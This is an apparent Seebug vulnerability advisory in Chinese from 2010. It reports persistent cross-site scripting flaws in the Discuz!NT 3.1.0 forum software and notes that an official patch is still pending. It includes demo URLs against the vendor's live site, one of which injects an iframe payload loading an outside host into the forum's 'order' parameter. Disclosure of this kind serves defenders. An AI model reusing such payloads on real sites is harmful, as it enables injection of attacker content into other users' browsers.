Discuz!NT 3.1.0 多处持久性跨站漏洞

2010-05-01T00:00:00
ID SSV:19538
Type seebug
Reporter Root
Modified 2010-05-01T00:00:00

Description

Discuz!NT,是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件,包括论坛、Space (个人空 间)、相册、聚合等功能,后台自由选择开启。

1.论坛相册空间日志发表评论,插入跨站语句即可: demo:http://nt.discuz.net/showphoto.aspx?photoid=42

  1. 在论坛板块版面出随意选择一种浏览方式,然后修改或添加加入跨站语句,获得地址: demo:http://nt.discuz.net/showforum.aspx?search=1&forumid=10&typeid=0&filter=&order=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E

Discuz!NT 3.1.0 等待官方补丁 http://nt.discuz.net

                                        
                                            
                                                http://nt.discuz.net/showphoto.aspx?photoid=42
http://nt.discuz.net/showforum.aspx?search=1&forumid=10&typeid=0&filter=&order=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E